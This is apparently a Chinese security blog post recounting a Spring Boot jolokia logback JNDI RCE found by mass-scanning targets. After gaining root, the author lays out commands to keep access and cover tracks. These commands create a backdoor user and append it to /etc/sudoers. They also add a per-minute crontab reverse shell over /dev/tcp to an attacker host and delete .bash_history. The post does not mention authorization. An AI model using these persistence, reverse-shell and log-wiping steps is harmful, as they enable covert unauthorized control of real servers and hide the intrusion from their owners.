记一次Spring boot的jolokia logback导致的RCE

目标信息

打点过程

  • 使用fofa批量扫描springboot指纹,然后使用nuclei扫描,发现存在jolokia logback JNDI RCE。具体渗透过程参考:「Springboot」记一次jolokia logback JNDI RCE

  • 获取到ROOT权限,查看/etc/ssh/sshd_config发现不允许ROOT直接登录;所以创建普通用户留下后门用户。

    //PermitRootLogin no 不允许root直接登录
    cat /etc/ssh/sshd_config | grep "PermitRoot" 
    //创建普通用户,并且设置密码
    useradd sinan
    echo "密码" | passwd --stdin sinan
  • 权限维持,将普通用户添加sudoers文件,可以直接提权。crontab定时任务可以定时反弹shell

    //将普通用户添加进sudoers文件,可以普通用户直接提权
    echo "sinan    ALL=(ALL)       ALL" >> /etc/sudoers
    //crontab添加定时反弹shell
    //知识点: bash反弹shell可以把ip换为域名,这样换VPS后IP变动也可以获取到shell
    crontab -e
    \* * * * * bash -c 'bash -i >& /dev/tcp/ip或者域名/端口 0>&1'
  • 删除.bash_history,清除命令历史

    rm -rf .bash_history

Win

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇